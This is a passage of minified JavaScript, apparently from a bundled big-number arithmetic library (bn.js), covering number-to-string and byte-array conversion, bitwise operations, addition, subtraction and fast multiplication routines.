R=this.words[h],J=(16777215&(R<<X|L)).toString(16);L=R>>>24-X&16777215,(X+=2)>=26&&(X-=26,h--),G=0!==L||h!==this.length-1?y[6-J.length]+J+G:J+G}for(0!==L&&(G=L.toString(16)+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}if(v===(0|v)&&v>=2&&v<=36){var Z=M[v],ue=p[v];G="";var Ie=this.clone();for(Ie.negative=0;!Ie.isZero();){var Ae=Ie.modrn(ue).toString(v);G=(Ie=Ie.idivn(ue)).isZero()?Ae+G:y[Z-Ae.length]+Ae+G}for(this.isZero()&&(G="0"+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var v=this.words[0];return 2===this.length?v+=67108864*this.words[1]:3===this.length&&1===this.words[2]?v+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-v:v},I.prototype.toJSON=function(){return this.toString(16,2)},Q&&(I.prototype.toBuffer=function(v,P){return this.toArrayLike(Q,v,P)}),I.prototype.toArray=function(v,P){return this.toArrayLike(Array,v,P)},I.prototype.toArrayLike=function(v,P,G){this._strip();var X=this.byteLength(),L=G||Math.max(1,X);$(X<=L,"byte array longer than desired length"),$(L>0,"Requested array length <= 0");var h=function(v,P){return v.allocUnsafe?v.allocUnsafe(P):new v(P)}(v,L);return this["_toArrayLike"+("le"===P?"LE":"BE")](h,X),h},I.prototype._toArrayLikeLE=function(v,P){for(var G=0,X=0,L=0,h=0;L<this.length;L++){var R=this.words[L]<<h|X;v[G++]=255&R,G<v.length&&(v[G++]=R>>8&255),G<v.length&&(v[G++]=R>>16&255),6===h?(G<v.length&&(v[G++]=R>>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G<v.length)for(v[G++]=X;G<v.length;)v[G++]=0},I.prototype._toArrayLikeBE=function(v,P){for(var G=v.length-1,X=0,L=0,h=0;L<this.length;L++){var R=this.words[L]<<h|X;v[G--]=255&R,G>=0&&(v[G--]=R>>8&255),G>=0&&(v[G--]=R>>16&255),6===h?(G>=0&&(v[G--]=R>>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G>=0)for(v[G--]=X;G>=0;)v[G--]=0},I.prototype._countBits=Math.clz32?function(v){return 32-Math.clz32(v)}:function(v){var P=v,G=0;return P>=4096&&(G+=13,P>>>=13),P>=64&&(G+=7,P>>>=7),P>=8&&(G+=4,P>>>=4),P>=2&&(G+=2,P>>>=2),G+P},I.prototype._zeroBits=function(v){if(0===v)return 26;var P=v,G=0;return 0==(8191&P)&&(G+=13,P>>>=13),0==(127&P)&&(G+=7,P>>>=7),0==(15&P)&&(G+=4,P>>>=4),0==(3&P)&&(G+=2,P>>>=2),0==(1&P)&&G++,G},I.prototype.bitLength=function(){var P=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+P},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var v=0,P=0;P<this.length;P++){var G=this._zeroBits(this.words[P]);if(v+=G,26!==G)break}return v},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(v){return 0!==this.negative?this.abs().inotn(v).iaddn(1):this.clone()},I.prototype.fromTwos=function(v){return this.testn(v-1)?this.notn(v).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(v){for(;this.length<v.length;)this.words[this.length++]=0;for(var P=0;P<v.length;P++)this.words[P]=this.words[P]|v.words[P];return this._strip()},I.prototype.ior=function(v){return $(0==(this.negative|v.negative)),this.iuor(v)},I.prototype.or=function(v){return this.length>v.length?this.clone().ior(v):v.clone().ior(this)},I.prototype.uor=function(v){return this.length>v.length?this.clone().iuor(v):v.clone().iuor(this)},I.prototype.iuand=function(v){var P;P=this.length>v.length?v:this;for(var G=0;G<P.length;G++)this.words[G]=this.words[G]&v.words[G];return this.length=P.length,this._strip()},I.prototype.iand=function(v){return $(0==(this.negative|v.negative)),this.iuand(v)},I.prototype.and=function(v){return this.length>v.length?this.clone().iand(v):v.clone().iand(this)},I.prototype.uand=function(v){return this.length>v.length?this.clone().iuand(v):v.clone().iuand(this)},I.prototype.iuxor=function(v){var P,G;this.length>v.length?(P=this,G=v):(P=v,G=this);for(var X=0;X<G.length;X++)this.words[X]=P.words[X]^G.words[X];if(this!==P)for(;X<P.length;X++)this.words[X]=P.words[X];return this.length=P.length,this._strip()},I.prototype.ixor=function(v){return $(0==(this.negative|v.negative)),this.iuxor(v)},I.prototype.xor=function(v){return this.length>v.length?this.clone().ixor(v):v.clone().ixor(this)},I.prototype.uxor=function(v){return this.length>v.length?this.clone().iuxor(v):v.clone().iuxor(this)},I.prototype.inotn=function(v){$("number"==typeof v&&v>=0);var P=0|Math.ceil(v/26),G=v%26;this._expand(P),G>0&&P--;for(var X=0;X<P;X++)this.words[X]=67108863&~this.words[X];return G>0&&(this.words[X]=~this.words[X]&67108863>>26-G),this._strip()},I.prototype.notn=function(v){return this.clone().inotn(v)},I.prototype.setn=function(v,P){$("number"==typeof v&&v>=0);var G=v/26|0,X=v%26;return this._expand(G+1),this.words[G]=P?this.words[G]|1<<X:this.words[G]&~(1<<X),this._strip()},I.prototype.iadd=function(v){var P,G,X;if(0!==this.negative&&0===v.negative)return this.negative=0,P=this.isub(v),this.negative^=1,this._normSign();if(0===this.negative&&0!==v.negative)return v.negative=0,P=this.isub(v),v.negative=1,P._normSign();this.length>v.length?(G=this,X=v):(G=v,X=this);for(var L=0,h=0;h<X.length;h++)this.words[h]=67108863&(P=(0|G.words[h])+(0|X.words[h])+L),L=P>>>26;for(;0!==L&&h<G.length;h++)this.words[h]=67108863&(P=(0|G.words[h])+L),L=P>>>26;if(this.length=G.length,0!==L)this.words[this.length]=L,this.length++;else if(G!==this)for(;h<G.length;h++)this.words[h]=G.words[h];return this},I.prototype.add=function(v){var P;return 0!==v.negative&&0===this.negative?(v.negative=0,P=this.sub(v),v.negative^=1,P):0===v.negative&&0!==this.negative?(this.negative=0,P=v.sub(this),this.negative=1,P):this.length>v.length?this.clone().iadd(v):v.clone().iadd(this)},I.prototype.isub=function(v){if(0!==v.negative){v.negative=0;var P=this.iadd(v);return v.negative=1,P._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(v),this.negative=1,this._normSign();var X,L,G=this.cmp(v);if(0===G)return this.negative=0,this.length=1,this.words[0]=0,this;G>0?(X=this,L=v):(X=v,L=this);for(var h=0,R=0;R<L.length;R++)h=(P=(0|X.words[R])-(0|L.words[R])+h)>>26,this.words[R]=67108863&P;for(;0!==h&&R<X.length;R++)h=(P=(0|X.words[R])+h)>>26,this.words[R]=67108863&P;if(0===h&&R<X.length&&X!==this)for(;R<X.length;R++)this.words[R]=X.words[R];return this.length=Math.max(this.length,R),X!==this&&(this.negative=1),this._strip()},I.prototype.sub=function(v){return this.clone().isub(v)};var S=function(v,P,G){var J,Z,ue,X=v.words,L=P.words,h=G.words,R=0,Ie=0|X[0],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|X[1],He=8191&Xe,Be=Xe>>>13,qe=0|X[2],De=8191&qe,Ve=qe>>>13,ze=0|X[3],me=8191&ze,Ke=ze>>>13,rt=0|X[4],Ge=8191&rt,Qe=rt>>>13,ht=0|X[5],mt=8191&ht,lt=ht>>>13,ft=0|X[6],xe=8191&ft,We=ft>>>13,Je=0|X[7],Oe=8191&Je,Te=Je>>>13,Le=0|X[8],$e=8191&Le,st=Le>>>13,xt=0|X[9],pt=8191&xt,vt=xt>>>13,Wi=0|L[0],Ft=8191&Wi,zt=Wi>>>13,fa=0|L[1],Jt=8191&fa,Gt=fa>>>13,Co=0|L[2],jt=8191&Co,qt=Co>>>13,Qn=0|L[3],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|L[4],ti=8191&Bo,ii=Bo>>>13,pn=0|L[5],Pt=8191&pn,Xt=pn>>>13,Ho=0|L[6],Qt=8191&Ho,ei=Ho>>>13,$o=0|L[7],ai=8191&$o,$t=$o>>>13,zo=0|L[8],Ut=8191&zo,Yt=zo>>>13,ua=0|L[9],Ha=8191&ua,Va=ua>>>13;G.negative=v.negative^P.negative,G.length=19;var co=(R+(J=Math.imul(Ae,Ft))|0)+((8191&(Z=(Z=Math.imul(Ae,zt))+Math.imul(Ue,Ft)|0))<<13)|0;R=((ue=Math.imul(Ue,zt))+(Z>>>13)|0)+(co>>>26)|0,co&=67108863,J=Math.imul(He,Ft),Z=(Z=Math.imul(He,zt))+Math.imul(Be,Ft)|0,ue=Math.imul(Be,zt);var io=(R+(J=J+Math.imul(Ae,Jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Gt)|0)+(Z>>>13)|0)+(io>>>26)|0,io&=67108863,J=Math.imul(De,Ft),Z=(Z=Math.imul(De,zt))+Math.imul(Ve,Ft)|0,ue=Math.imul(Ve,zt),J=J+Math.imul(He,Jt)|0,Z=(Z=Z+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,ue=ue+Math.imul(Be,Gt)|0;var yo=(R+(J=J+Math.imul(Ae,jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,qt)|0)+(Z>>>13)|0)+(yo>>>26)|0,yo&=67108863,J=Math.imul(me,Ft),Z=(Z=Math.imul(me,zt))+Math.imul(Ke,Ft)|0,ue=Math.imul(Ke,zt),J=J+Math.imul(De,Jt)|0,Z=(Z=Z+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,ue=ue+Math.imul(Ve,Gt)|0,J=J+Math.imul(He,jt)|0,Z=(Z=Z+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,ue=ue+Math.imul(Be,qt)|0;var Vn=(R+(J=J+Math.imul(Ae,Kt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Zt)|0)+(Z>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,J=Math.imul(Ge,Ft),Z=(Z=Math.imul(Ge,zt))+Math.imul(Qe,Ft)|0,ue=Math.imul(Qe,zt),J=J+Math.imul(me,Jt)|0,Z=(Z=Z+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,ue=ue+Math.imul(Ke,Gt)|0,J=J+Math.imul(De,jt)|0,Z=(Z=Z+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,ue=ue+Math.imul(Ve,qt)|0,J=J+Math.imul(He,Kt)|0,Z=(Z=Z+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,ue=ue+Math.imul(Be,Zt)|0;var Eo=(R+(J=J+Math.imul(Ae,ti)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ii)|0)+(Z>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,J=Math.imul(mt,Ft),Z=(Z=Math.imul(mt,zt))+Math.imul(lt,Ft)|0,ue=Math.imul(lt,zt),J=J+Math.imul(Ge,Jt)|0,Z=(Z=Z+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,ue=ue+Math.imul(Qe,Gt)|0,J=J+Math.imul(me,jt)|0,Z=(Z=Z+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,ue=ue+Math.imul(Ke,qt)|0,J=J+Math.imul(De,Kt)|0,Z=(Z=Z+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,ue=ue+Math.imul(Ve,Zt)|0,J=J+Math.imul(He,ti)|0,Z=(Z=Z+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,ue=ue+Math.imul(Be,ii)|0;var Pn=(R+(J=J+Math.imul(Ae,Pt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Xt)|0)+(Z>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,J=Math.imul(xe,Ft),Z=(Z=Math.imul(xe,zt))+Math.imul(We,Ft)|0,ue=Math.imul(We,zt),J=J+Math.imul(mt,Jt)|0,Z=(Z=Z+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,ue=ue+Math.imul(lt,Gt)|0,J=J+Math.imul(Ge,jt)|0,Z=(Z=Z+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,ue=ue+Math.imul(Qe,qt)|0,J=J+Math.imul(me,Kt)|0,Z=(Z=Z+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,ue=ue+Math.imul(Ke,Zt)|0,J=J+Math.imul(De,ti)|0,Z=(Z=Z+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,ue=ue+Math.imul(Ve,ii)|0,J=J+Math.imul(He,Pt)|0,Z=(Z=Z+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,ue=ue+Math.imul(Be,Xt)|0;var lo=(R+(J=J+Math.imul(Ae,Qt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ei)|0)+(Z>>>13)|0)+(lo>>>26)|0,lo&=67108863,J=Math.imul(Oe,Ft),Z=(Z=Math.imul(Oe,zt))+Math.imul(Te,Ft)|0,ue=Math.imul(Te,zt),J=J+Math.imul(xe,Jt)|0,Z=(Z=Z+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,ue=ue+Math.imul(We,Gt)|0,J=J+Math.imul(mt,jt)|0,Z=(Z=Z+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,ue=ue+Math.imul(lt,qt)|0,J=J+Math.imul(Ge,Kt)|0,Z=(Z=Z+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,ue=ue+Math.imul(Qe,Zt)|0,J=J+Math.imul(me,ti)|0,Z=(Z=Z+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,ue=ue+Math.imul(Ke,ii)|0,J=J+Math.imul(De,Pt)|0,Z=(Z=Z+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,ue=ue+Math.imul(Ve,Xt)|0,J=J+Math.imul(He,Qt)|0,Z=(Z=Z+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,ue=ue+Math.imul(Be,ei)|0;var ao=(R+(J=J+Math.imul(Ae,ai)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,$t)|0)+(Z>>>13)|0)+(ao>>>26)|0,ao&=67108863,J=Math.imul($e,Ft),Z=(Z=Math.imul($e,zt))+Math.imul(st,Ft)|0,ue=Math.imul(st,zt),J=J+Math.imul(Oe,Jt)|0,Z=(Z=Z+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,ue=ue+Math.imul(Te,Gt)|0,J=J+Math.imul(xe,jt)|0,Z=(Z=Z+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,ue=ue+Math.imul(We,qt)|0,J=J+Math.imul(mt,Kt)|0,Z=(Z=Z+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,ue=ue+Math.imul(lt,Zt)|0,J=J+Math.imul(Ge,ti)|0,Z=(Z=Z+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,ue=ue+Math.imul(Qe,ii)|0,J=J+Math.imul(me,Pt)|0,Z=(Z=Z+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,ue=ue+Math.imul(Ke,Xt)|0,J=J+Math.imul(De,Qt)|0,Z=(Z=Z+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,ue=ue+Math.imul(Ve,ei)|0,J=J+Math.imul(He,ai)|0,Z=(Z=Z+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,ue=ue+Math.imul(Be,$t)|0;var bo=(R+(J=J+Math.imul(Ae,Ut)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Yt)|0)+(Z>>>13)|0)+(bo>>>26)|0,bo&=67108863,J=Math.imul(pt,Ft),Z=(Z=Math.imul(pt,zt))+Math.imul(vt,Ft)|0,ue=Math.imul(vt,zt),J=J+Math.imul($e,Jt)|0,Z=(Z=Z+Math.imul($e,Gt)|0)+Math.imul(st,Jt)|0,ue=ue+Math.imul(st,Gt)|0,J=J+Math.imul(Oe,jt)|0,Z=(Z=Z+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,ue=ue+Math.imul(Te,qt)|0,J=J+Math.imul(xe,Kt)|0,Z=(Z=Z+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,ue=ue+Math.imul(We,Zt)|0,J=J+Math.imul(mt,ti)|0,Z=(Z=Z+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,ue=ue+Math.imul(lt,ii)|0,J=J+Math.imul(Ge,Pt)|0,Z=(Z=Z+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,ue=ue+Math.imul(Qe,Xt)|0,J=J+Math.imul(me,Qt)|0,Z=(Z=Z+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,ue=ue+Math.imul(Ke,ei)|0,J=J+Math.imul(De,ai)|0,Z=(Z=Z+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,ue=ue+Math.imul(Ve,$t)|0,J=J+Math.imul(He,Ut)|0,Z=(Z=Z+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0,ue=ue+Math.imul(Be,Yt)|0;var $n=(R+(J=J+Math.imul(Ae,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Va)|0)+Math.imul(Ue,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Va)|0)+(Z>>>13)|0)+($n>>>26)|0,$n&=67108863,J=Math.imul(pt,Jt),Z=(Z=Math.imul(pt,Gt))+Math.imul(vt,Jt)|0,ue=Math.imul(vt,Gt),J=J+Math.imul($e,jt)|0,Z=(Z=Z+Math.imul($e,qt)|0)+Math.imul(st,jt)|0,ue=ue+Math.imul(st,qt)|0,J=J+Math.imul(Oe,Kt)|0,Z=(Z=Z+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,ue=ue+Math.imul(Te,Zt)|0,J=J+Math.imul(xe,ti)|0,Z=(Z=Z+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,ue=ue+Math.imul(We,ii)|0,J=J+Math.imul(mt,Pt)|0,Z=(Z=Z+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,ue=ue+Math.imul(lt,Xt)|0,J=J+Math.imul(Ge,Qt)|0,Z=(Z=Z+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,ue=ue+Math.imul(Qe,ei)|0,J=J+Math.imul(me,ai)|0,Z=(Z=Z+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,ue=ue+Math.imul(Ke,$t)|0,J=J+Math.imul(De,Ut)|0,Z=(Z=Z+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0,ue=ue+Math.imul(Ve,Yt)|0;var Do=(R+(J=J+Math.imul(He,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(He,Va)|0)+Math.imul(Be,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Be,Va)|0)+(Z>>>13)|0)+(Do>>>26)|0,Do&=67108863,J=Math.imul(pt,jt),Z=(Z=Math.imul(pt,qt))+Math.imul(vt,jt)|0,ue=Math.imul(vt,qt),J=J+Math.imul($e,Kt)|0,Z=(Z=Z+Math.imul($e,Zt)|0)+Math.imul(st,Kt)|0,ue=ue+Math.imul(st,Zt)|0,J=J+Math.imul(Oe,ti)|0,Z=(Z=Z+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,ue=ue+Math.imul(Te,ii)|0,J=J+Math.imul(xe,Pt)|0,Z=(Z=Z+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,ue=ue+Math.imul(We,Xt)|0,J=J+Math.imul(mt,Qt)|0,Z=(Z=Z+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,ue=ue+Math.imul(lt,ei)|0,J=J+Math.imul(Ge,ai)|0,Z=(Z=Z+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,ue=ue+Math.imul(Qe,$t)|0,J=J+Math.imul(me,Ut)|0,Z=(Z=Z+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0,ue=ue+Math.imul(Ke,Yt)|0;var Mo=(R+(J=J+Math.imul(De,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(De,Va)|0)+Math.imul(Ve,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ve,Va)|0)+(Z>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,J=Math.imul(pt,Kt),Z=(Z=Math.imul(pt,Zt))+Math.imul(vt,Kt)|0,ue=Math.imul(vt,Zt),J=J+Math.imul($e,ti)|0,Z=(Z=Z+Math.imul($e,ii)|0)+Math.imul(st,ti)|0,ue=ue+Math.imul(st,ii)|0,J=J+Math.imul(Oe,Pt)|0,Z=(Z=Z+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,ue=ue+Math.imul(Te,Xt)|0,J=J+Math.imul(xe,Qt)|0,Z=(Z=Z+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,ue=ue+Math.imul(We,ei)|0,J=J+Math.imul(mt,ai)|0,Z=(Z=Z+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,ue=ue+Math.imul(lt,$t)|0,J=J+Math.imul(Ge,Ut)|0,Z=(Z=Z+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0,ue=ue+Math.imul(Qe,Yt)|0;var no=(R+(J=J+Math.imul(me,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(me,Va)|0)+Math.imul(Ke,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ke,Va)|0)+(Z>>>13)|0)+(no>>>26)|0,no&=67108863,J=Math.imul(pt,ti),Z=(Z=Math.imul(pt,ii))+Math.imul(vt,ti)|0,ue=Math.imul(vt,ii),J=J+Math.imul($e,Pt)|0,Z=(Z=Z+Math.imul($e,Xt)|0)+Math.imul(st,Pt)|0,ue=ue+Math.imul(st,Xt)|0,J=J+Math.imul(Oe,Qt)|0,Z=(Z=Z+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,ue=ue+Math.imul(Te,ei)|0,J=J+Math.imul(xe,ai)|0,Z=(Z=Z+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,ue=ue+Math.imul(We,$t)|0,J=J+Math.imul(mt,Ut)|0,Z=(Z=Z+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0,ue=ue+Math.imul(lt,Yt)|0;var Kn=(R+(J=J+Math.imul(Ge,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ge,Va)|0)+Math.imul(Qe,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Qe,Va)|0)+(Z>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,J=Math.imul(pt,Pt),Z=(Z=Math.imul(pt,Xt))+Math.imul(vt,Pt)|0,ue=Math.imul(vt,Xt),J=J+Math.imul($e,Qt)|0,Z=(Z=Z+Math.imul($e,ei)|0)+Math.imul(st,Qt)|0,ue=ue+Math.imul(st,ei)|0,J=J+Math.imul(Oe,ai)|0,Z=(Z=Z+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,ue=ue+Math.imul(Te,$t)|0,J=J+Math.imul(xe,Ut)|0,Z=(Z=Z+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0,ue=ue+Math.imul(We,Yt)|0;var Sa=(R+(J=J+Math.imul(mt,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(mt,Va)|0)+Math.imul(lt,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(lt,Va)|0)+(Z>>>13)|0)+(Sa>>>26)|0,Sa&=67108863,J=Math.imul(pt,Qt),Z=(Z=Math.imul(pt,ei))+Math.imul(vt,Qt)|0,ue=Math.imul(vt,ei),J=J+Math.imul($e,ai)|0,Z=(Z=Z+Math.imul($e,$t)|0)+Math.imul(st,ai)|0,ue=ue+Math.imul(st,$t)|0,J=J+Math.imul(Oe,Ut)|0,Z=(Z=Z+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0,ue=ue+Math.imul(Te,Yt)|0;var ra=(R+(J=J+Math.imul(xe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(xe,Va)|0)+Math.imul(We,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(We,Va)|0)+(Z>>>13)|0)+(ra>>>26)|0,ra&=67108863,J=Math.imul(pt,ai),Z=(Z=Math.imul(pt,$t))+Math.imul(vt,ai)|0,ue=Math.imul(vt,$t),J=J+Math.imul($e,Ut)|0,Z=(Z=Z+Math.imul($e,Yt)|0)+Math.imul(st,Ut)|0,ue=ue+Math.imul(st,Yt)|0;var Bd=(R+(J=J+Math.imul(Oe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Oe,Va)|0)+Math.imul(Te,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Te,Va)|0)+(Z>>>13)|0)+(Bd>>>26)|0,Bd&=67108863,J=Math.imul(pt,Ut),Z=(Z=Math.imul(pt,Yt))+Math.imul(vt,Ut)|0,ue=Math.imul(vt,Yt);var ll=(R+(J=J+Math.imul($e,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul($e,Va)|0)+Math.imul(st,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(st,Va)|0)+(Z>>>13)|0)+(ll>>>26)|0,ll&=67108863;var Bn=(R+(J=Math.imul(pt,Ha))|0)+((8191&(Z=(Z=Math.imul(pt,Va))+Math.imul(vt,Ha)|0))<<13)|0;return R=((ue=Math.imul(vt,Va))+(Z>>>13)|0)+(Bn>>>26)|0,Bn&=67108863,h[0]=co,h[1]=io,h[2]=yo,h[3]=Vn,h[4]=Eo,h[5]=Pn,h[6]=lo,h[7]=ao,h[8]=bo,h[9]=$n,h[10]=Do,h[11]=Mo,h[12]=no,h[13]=Kn,h[14]=Sa,h[15]=ra,h[16]=Bd,h[17]=ll,h[18]=Bn,0!==R&&(h[19]=R,G.length++),G};function O(A,v,P){P.negative=v.negative^A.negative,P.length=A.length+v.length;for(var G=0,X=0,L=0;L<P.length-1;L++){var h=X;X=0;for(var R=67108863&G,J=Math.min(L,v.length-1),Z=Math.max(0,L-A.length+1);Z<=J;Z++){var Ue=(0|A.words[L-Z])*(0|v.words[Z]),Xe=67108863&Ue;R=67108863&(Xe=Xe+R|0),X+=(h=(h=h+(Ue/67108864|0)|0)+(Xe>>>26)|0)>>>26,h&=67108863}P.words[L]=R,G=h,h=X}return 0!==G?P.words[L]=G:P.length--,P._strip()}function U(A,v,P){return O(A,v,P)}function K(A,v){this.x=A,this.y=v}Math.imul||(S=x),I.prototype.mulTo=function(v,P){var X=this.length+v.length;return 10===this.length&&10===v.length?S(this,v,P):X<63?x(this,v,P):X<1024?O(this,v,P):U(this,v,P)},K.prototype.makeRBT=function(v){for(var P=new Array(v),G=I.prototype._countBits(v)-1,X=0;X<v;X++)P[X]=this.revBin(X,G,v);return P},K.prototype.revBin=function(v,P,G){if(0===v||v===G-1)return v;for(var X=0,L=0;L<P;L++)X|=(1&v)<<P-L-1,v>>=1;return X},K.prototype.permute=function(v,P,G,X,L,h){for(var R=0;R<h;R++)X[R]=P[v[R]],L[R]=G[v[R]]},K.prototype.transform=function(v,P,G,X,L,h){this.permute(h,v,P,G,X,L);for(var R=1;R<L;R<<=1)for(var J=R<<1,Z=Math.cos(2*Math.PI/J),ue=Math.sin(2*Math.PI/J),Ie=0;Ie<L;Ie+=J)for(var Ae=Z,Ue=ue,Xe=0;Xe<R;Xe++){var He=G[Ie+Xe],Be=X[Ie+Xe],qe=G[Ie+Xe+R],De=X[Ie+Xe+R],Ve=Ae*qe-Ue*De;De=Ae*De+Ue*qe,G[Ie+Xe]=He+(qe=Ve),X[Ie+Xe]=Be+De,G[Ie+Xe+R]=He-qe,X[Ie+Xe+R]=Be-De,Xe!==J&&(Ve=Z*Ae-ue*Ue,Ue=Z*Ue+ue*Ae,Ae=Ve)}},K.prototype.guessLen13b=function(v,P){var G=1|Math.max(P,v),X=1&G,L=0;for(G=G/2|0;G;G>>>=1)L++;return 1<<L+1+X},K.prototype.conjugate=function(v,P,G){if(!(G<=1))for(var X=0;X<G/2;X++){var L=v[X];v[X]=v[G-X-1],v[G-X-1]=L,L=P[X],P[X]=-P[G-X-1],P[G-X-1]=-L}},K.prototype.normalize13b=function(v,P){for(var G=0,X=0;X<P/2;X++){var L=8192*Math.round(v[2*X+1]/P)+Math.round(v[2*X]/P)+G;v[X]=67108863&L,G=L<67108864?0:L/67108864|0}return v},K.prototype.convert13b=function(v,P,G,X){for(var L=0,h=0;h<P;h++)G[2*h]=8191&(L+=0|v[h]),G[2*h+1]=8191&(L>>>=13),L>>>=13;for(h=2*P;h<X;++h)G[h]=0;$(0===L),$(0==(-8192&L))},K.prototype.stub=function(v){for(var P=new Array(v),G=0;G<v;G++)P[G]=0;return 